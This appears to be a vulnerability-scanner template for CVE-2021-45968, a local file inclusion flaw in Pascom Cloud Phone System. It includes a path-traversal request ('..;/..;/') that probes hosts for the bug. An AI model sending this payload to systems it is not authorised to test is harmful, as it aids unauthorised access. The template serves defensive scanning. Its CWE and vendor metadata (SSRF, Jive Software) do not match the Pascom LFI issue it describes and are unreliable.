id: CVE-2021-45968 info: name: Pascom CPS - Local File Inclusion author: dwisiswant0 severity: high description: | Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability. impact: | The vulnerability can be exploited by an attacker to gain unauthorized access to sensitive information, execute arbitrary code, or perform other malicious activities. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS. reference: - https://kerbit.io/research/read/blog/4 - https://www.pascom.net/doc/en/release-notes/ - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html - https://nvd.nist.gov/vuln/detail/CVE-2021-45968 - https://jivesoftware.com/platform/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-45968 cwe-id: CWE-918 epss-score: 0.01712 epss-percentile: 0.87786 cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jivesoftware product: jive tags: cve2021,cve,pascom,lfi,jivesoftware http: - raw: - | GET /services/pluginscript/ HTTP/1.1 Host: {{Hostname}} GET /services/pluginscript/..;/..;/ HTTP/1.1 Host: {{Hostname}} GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code_2 != status_code_1" condition: and # digest: 4a0a004730450221008200ee8e3932d388cd9c9a19d892c6ad5f51c3f48564a2cca1a4985648f3116d02202921b3e5bba285639c908776508b397c7d9b01bc8b72362eceab71436a311b43:922c64590222798bb761d5b6d8e72950